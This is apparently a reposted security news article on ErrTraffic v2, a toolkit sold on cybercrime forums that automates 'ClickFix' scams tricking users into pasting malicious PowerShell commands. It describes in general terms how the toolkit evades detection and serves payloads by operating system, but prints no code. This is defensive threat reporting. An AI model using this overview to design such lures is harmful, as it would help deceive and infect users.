By rssfeeds-admin 
The toolkit, known as ErrTraffic v2, industrializes the “ClickFix” scam deceptive overlays that manipulate victims into manually executing malicious scripts.
Promoted on Russian-language cybercrime forums by a threat actor using the alias “LenAI”, ErrTraffic is being sold for about $800, dramatically lowering the technical barrier for entry-level hackers to launch professional-grade attacks.
class="wp-block-heading" id="h-from-drive-by-downloads-to-clickfix-campaigns">From Drive-By Downloads to ClickFix Campaigns
Researchers at Hudson Rock report that the emergence of ErrTraffic reflects a significant shift in attack strategy.
As browser security has made drive-by downloads nearly obsolete, cybercriminals have turned to “Social Engineering 2.0,” focusing on psychological exploitation rather than software vulnerabilities.
The ClickFix model presents victims with fake system errors or corrupted text elements, visual “glitches” that appear to break a website. To fix the issue, users are instructed to copy a “verification code” into Windows Run or PowerShell, unknowingly executing malware.
This approach effectively defeats most modern defense systems. From the browser’s point of view, the user copies legitimate text.
From the endpoint detection system’s perspective, the PowerShell command appears to have been initiated by the user, not by an external file. Once executed, however, the script downloads and runs a stealth payload with full privileges, bypassing traditional scanning or sandboxing.
The Industrial Design of ErrTraffic
Hudson Rock’s investigation revealed that the tool includes a refined web dashboard resembling legitimate marketing software.
Panels show campaign statistics such as page views, downloads, and infection rates, some reaching nearly 60 percent, an extraordinarily high success rate for social engineering campaigns.
ErrTraffic functions as a Traffic Distribution System (TDS) that delivers different payloads depending on the victim’s operating system.
It can target Windows, macOS, Android, and Linux platforms by serving customized files through a single injected HTML line. The system relies on a .js.php script that executes server-side logic on delivers dynamic JavaScript to browsers, ensuring stealth and persistence.
One of the tool’s major selling points is that it “does not affect site files.” The malicious overlay only triggers under certain conditions, allowing legitimate websites to continue functioning normally.
It also excludes Commonwealth of Independent States (CIS) regions from targeting, consistent with Russian-speaking cybercrime communities that aim to evade local law enforcement.
Hudson Rock warns that ErrTraffic could feed a self-sustaining infection cycle, as stolen website credentials are reused to deploy the same scripts elsewhere.
The campaign illustrates how modern cybercrime has evolved, with social engineering, not software exploits, becoming the most powerful vector of compromise.
Follow us on Google News , LinkedIn and X to Get More Instant Updates, Set Cyberpress as a Preferred Source in Google.
The post ErrTraffic Emerges as a New Tool for Automating ClickFix Cyberattacks appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.